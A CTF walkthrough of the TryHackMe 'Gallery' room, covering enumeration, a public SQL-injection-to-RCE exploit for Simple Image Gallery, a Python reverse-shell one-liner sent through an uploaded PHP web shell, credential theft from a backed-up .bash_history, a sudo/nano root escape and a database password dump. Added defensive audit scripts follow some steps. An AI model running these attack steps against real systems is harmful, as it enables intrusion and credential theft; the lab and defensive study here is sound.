Gallery – Walkthrough En | TryHackMe – Write-up

Try to exploit our image gallery system

 

Gallery is an easy TryHackMe room. It follows the classic pattern: enumeration, finding an exploit, then privilege escalation.

 

Enumeration

Command :

nmap -sV -sC -p- 10.10.238.191

Web enumeration:

We will use dirsearch on the ports to determine which directories are present.

Command :

dirsearch -u 10.10.238.191

Command :

dirsearch -u 10.10.238.191:8080

Port 8080 serves a Simple Image Gallery System.

The /login.php page leads to a login form for which we do not have credentials.

 

However, we can see which CMS is used, and the landing page also reveals its version: v1.0.

Initial foothold

A Google search gives us a public exploit for this CMS: an RCE chained after an authentication bypass via SQL injection. https://www.exploit-db.com/exploits/50214

Exploitation of the flaw.

Download the exploit and save it as a .py file, then run it with the following command :

python3.9 50214.py

In the TARGET= variable, put the address of the CMS: http://10.10.238.191:8080/

System Access.

Once the exploit has run, browse to the address it prints. From there you can issue system commands, including a one-liner reverse shell.

Python is installed on the system, so we can use it to get a reverse shell.

Command :

python3.6 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.38.124",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Command with URL :

http://10.10.238.191/gallery/uploads/1644783960_TagosxtvnjlxilqprhyLetta.php?cmd=python3.6%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.11.38.124%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
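The foothold above works because a file ending in .php was accepted by the gallery's upload feature and then served from /gallery/uploads/ by the PHP engine. As an added defensive example (not code from the write-up or from the CMS), the script below audits an uploads directory the way an administrator would: it flags files with a script extension anywhere in the name, files whose bytes contain a PHP open tag even under an image extension, and files whose magic bytes do not match a known image format. The directory, file names and contents are constructed for the demo; the image-signature table is deliberately small.

```python
# Added example (not part of the write-up): audit an image-gallery upload
# directory for files that a web server could execute as PHP.
# All paths and sample files below are constructed for the demo.
import os
import tempfile

SCRIPT_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
# Small constructed table of image signatures; extend it for the formats you allow.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
PHP_TAGS = (b"<?php", b"<?=")


def classify_upload(path):
    """Return the list of reasons `path` is risky; empty if it looks like a plain image."""
    reasons = []
    name = os.path.basename(path)
    # Look at every dotted component, not only the last one: names such as
    # 'x.php.jpg' are treated as PHP by some server configurations.
    parts = name.lower().split(".")[1:]
    if any("." + p in SCRIPT_EXTENSIONS for p in parts):
        reasons.append("script extension")
    with open(path, "rb") as fh:
        head = fh.read(64 * 1024)
    if any(tag in head for tag in PHP_TAGS):
        reasons.append("contains PHP open tag")
    if not any(head.startswith(magic) for magic in IMAGE_MAGIC):
        reasons.append("not an image by magic bytes")
    return reasons


def audit_upload_dir(upload_dir):
    """Walk `upload_dir`; return {relative_path: [reasons]} for every flagged file."""
    findings = {}
    for root, _dirs, files in os.walk(upload_dir):
        for fname in files:
            full = os.path.join(root, fname)
            reasons = classify_upload(full)
            if reasons:
                findings[os.path.relpath(full, upload_dir)] = reasons
    return findings


def build_demo_dir():
    """Create a constructed uploads directory: one clean image and two bad files."""
    d = tempfile.mkdtemp(prefix="gallery_uploads_")
    with open(os.path.join(d, "holiday.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0" + b"\x00" * 32)          # minimal JPEG header
    with open(os.path.join(d, "upload_sample.php"), "wb") as fh:
        fh.write(b"<?php echo 'constructed sample'; ?>")      # a script where only images belong
    with open(os.path.join(d, "avatar.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n" + b"<?php echo 1; ?>")  # polyglot: PNG header, PHP body
    return d


if __name__ == "__main__":
    demo = build_demo_dir()
    for rel, why in sorted(audit_upload_dir(demo).items()):
        print(f"{rel}: {', '.join(why)}")
```

Running it against the constructed directory reports upload_sample.php (three reasons) and avatar.png (PHP tag inside a valid PNG header) and stays silent on holiday.jpg. The scan is a detection aid; the actual fix is for the upload handler to validate content the same way before writing the file, and for the web server to refuse to execute scripts from the uploads directory at all.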

 

Lateral movement towards Mike.

After upgrading the shell, the next step is to switch to the user mike. With the help of linpeas.sh, we find mike's credentials in /var/backups/mike_home_backup/.

Command :

cat .bash_history

Command :

su mike

password : the one found in .bash_history
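The credential came from a copy of a home directory placed under /var/backups, where the shell history lost the owner-only protection it had in the real home. As an added defensive example (not code from the write-up), the script below walks a backup tree, reports history files that are readable by group or others, and lists lines that look like a secret typed on the command line. The backup directory, file and history lines are constructed for the demo, and the secret patterns are a small starting set, not a complete list.

```python
# Added example (not from the write-up): find shell-history files copied into a
# backup location and check whether they are readable by other users or hold
# credential-looking command lines. Sample directory and lines are constructed.
import os
import re
import stat
import tempfile

HISTORY_NAMES = {".bash_history", ".zsh_history", ".mysql_history", ".python_history"}
# Commands that commonly carry a secret on the command line (constructed starter set).
SECRET_PATTERNS = [
    re.compile(r"\bmysql\b.*\s-p\S+"),                      # mysql -pSECRET
    re.compile(r"\bsshpass\s+-p\s*\S+"),                    # sshpass -p SECRET
    re.compile(r"\bcurl\b.*\s-u\s*\S+:\S+"),                # curl -u user:SECRET
    re.compile(r"(?i)(pass(word)?|passwd|token|secret)\s*[=:]\s*\S+"),
]


def credential_lines(text):
    """Return [(line_no, line)] for history lines matching a secret pattern."""
    return [(no, line) for no, line in enumerate(text.splitlines(), 1)
            if any(p.search(line) for p in SECRET_PATTERNS)]


def audit_backup_tree(root):
    """Walk `root`; report history files readable by group/others or holding secrets."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname not in HISTORY_NAMES:
                continue
            path = os.path.join(dirpath, fname)
            mode = os.stat(path).st_mode
            if mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append((path, "readable by group/others (mode %o)" % stat.S_IMODE(mode)))
            with open(path, "r", errors="replace") as fh:
                for no, line in credential_lines(fh.read()):
                    findings.append((path, f"line {no} looks like a credential: {line}"))
    return findings


def build_demo_backup():
    """Constructed backup tree: a copied home with a world-readable history file."""
    d = tempfile.mkdtemp(prefix="backups_")
    home = os.path.join(d, "alice_home_backup")
    os.makedirs(home)
    hist = os.path.join(home, ".bash_history")
    with open(hist, "w") as fh:
        fh.write("ls -la\n"
                 "mysql -u app_user -pS3cretExample app_db\n"   # constructed secret
                 "cd /var/www\n"
                 "export API_TOKEN=example-token-value\n")      # constructed secret
    os.chmod(hist, 0o644)   # the backup copy lost the owner-only mode
    return d


if __name__ == "__main__":
    for path, why in audit_backup_tree(build_demo_backup()):
        print(f"{path}: {why}")
```

On the constructed tree this reports the 644 mode once and then lines 2 and 4 of the history. Two follow-ups close the gap the write-up exploited: backups of home directories should keep the original modes (or live in a directory that is not world-traversable), and history files should be excluded or scrubbed before the backup is written.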

Privilege escalation.

Once logged in as mike, run sudo -l to list the user's sudo privileges.

mike can run the rootkit.sh script with sudo. This is a likely route to root, but before executing it we should look at what the script does.

Command :

cat /opt/rootkit.sh

The script offers several actions: check the version, run an update, and read the report, where the read option opens report.txt with nano.

Since the script runs with sudo, once report.txt is open in nano we can spawn a root shell from nano, as documented on the well-known site https://gtfobins.github.io/gtfobins/nano/#sudo

Command :

sudo /bin/bash /opt/rootkit.sh

Error ?

You may get this error: Error opening terminal: unknown.

 

To avoid this error, run this command :

export TERM=screen

Once the report is open in nano, press these key combinations:

ctrl + R then ctrl + X

This opens a prompt in which nano runs a command for you. Enter the following command line to become root:

reset ; sh 1>&0 2>&0
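The root of this escalation is a sudo rule that hands mike a script which, in turn, launches an interactive editor as root. As an added defensive example (not code from the write-up, and not a reproduction of /opt/rootkit.sh, whose real content is not shown here), the script below parses sudoers-style rules, follows commands that point at a shell script, and flags any invocation of an interactive program that GTFOBins documents as able to spawn a shell. The sudoers text, the stand-in script and the list of programs are constructed for the demo.

```python
# Added example (not from the write-up): audit sudo rules and the scripts they
# allow for calls to interactive programs that can drop to a shell.
# The sudoers lines, the script text and the program list are constructed samples.
import re
import shlex

# Small constructed list; the GTFOBins site catalogues the complete set.
SHELL_ESCAPE_PROGRAMS = {"nano", "vim", "vi", "less", "more", "man", "ed", "pico"}


def parse_sudoers_line(line):
    """Return (user, host, runas, [commands]) for a 'user host=(runas) cmd, cmd' rule, else None."""
    body = line.strip()
    if not body or body.startswith("#") or body.startswith("Defaults"):
        return None
    m = re.match(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\))?\s*(.+?)\s*$", body)
    if not m:
        return None
    user, host, runas, cmds = m.groups()
    commands = [c.strip() for c in cmds.split(",")]
    return user, host, runas or "root", commands


def find_shell_escapes(script_text):
    """Return [(line_no, program)] for script lines that invoke a listed program."""
    hits = []
    for no, line in enumerate(script_text.splitlines(), 1):
        stripped = line.split("#", 1)[0].strip()   # drop comments (and the shebang)
        if not stripped:
            continue
        try:
            tokens = shlex.split(stripped)
        except ValueError:
            tokens = stripped.split()
        for tok in tokens:
            if tok.rsplit("/", 1)[-1] in SHELL_ESCAPE_PROGRAMS:
                hits.append((no, tok.rsplit("/", 1)[-1]))
                break
    return hits


def audit_sudoers(sudoers_text, scripts):
    """Flag rules that run an escape program directly, or a script (path -> text) that does."""
    findings = []
    for line in sudoers_text.splitlines():
        parsed = parse_sudoers_line(line)
        if not parsed:
            continue
        user, _host, runas, commands = parsed
        for cmd in commands:
            cmd = re.sub(r"^(?:[A-Z]+:\s*)+", "", cmd)   # strip NOPASSWD:, NOEXEC: and similar tags
            for tok in cmd.split():
                base = tok.rsplit("/", 1)[-1]
                if base in SHELL_ESCAPE_PROGRAMS:
                    findings.append((user, runas, cmd, f"runs {base} directly"))
                elif tok in scripts:
                    for no, prog in find_shell_escapes(scripts[tok]):
                        findings.append((user, runas, cmd, f"{tok}:{no} calls {prog}"))
    return findings


# Constructed sudoers rule modelled on the one the write-up describes.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
mike ALL=(ALL) NOPASSWD: /bin/bash /opt/rootkit.sh
"""

# Constructed stand-in for a maintenance script with a 'read' option; not the real file.
SAMPLE_SCRIPT = """\
#!/bin/bash
# constructed stand-in for a maintenance script with a 'read' option
case "$1" in
  version) echo "1.0" ;;
  read)    nano /opt/report.txt ;;
  *)       echo "usage: $0 {version|read}" ;;
esac
"""

if __name__ == "__main__":
    for user, runas, cmd, why in audit_sudoers(SAMPLE_SUDOERS, {"/opt/rootkit.sh": SAMPLE_SCRIPT}):
        print(f"{user} as {runas}: {cmd}: {why}")
```

On the sample it reports that mike's rule reaches nano through line 5 of the script. The remediation is to keep interactive editors and pagers out of anything run under sudo: print the report with a non-interactive command, or use sudoedit when the file genuinely needs editing, so the privileged process never offers a command prompt.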

How to get the hash of the admin account.

Command :

find / -maxdepth 8 -name "*.php" -type f 2>/dev/null | xargs grep -C 20 -i pass

To learn more about the find command, you can read this article.

Once the database credentials have been retrieved, connect to the MySQL server.

Command :

mysql -u gallery_user -p

Then run these commands :

show databases;

use gallery_db

show tables;

select * from users;


That’s all folks

Thank you for taking the trouble to come to the site to read this Write Up

I hope you enjoyed it and that it taught you something new.

Feel free to leave a comment or share this article.
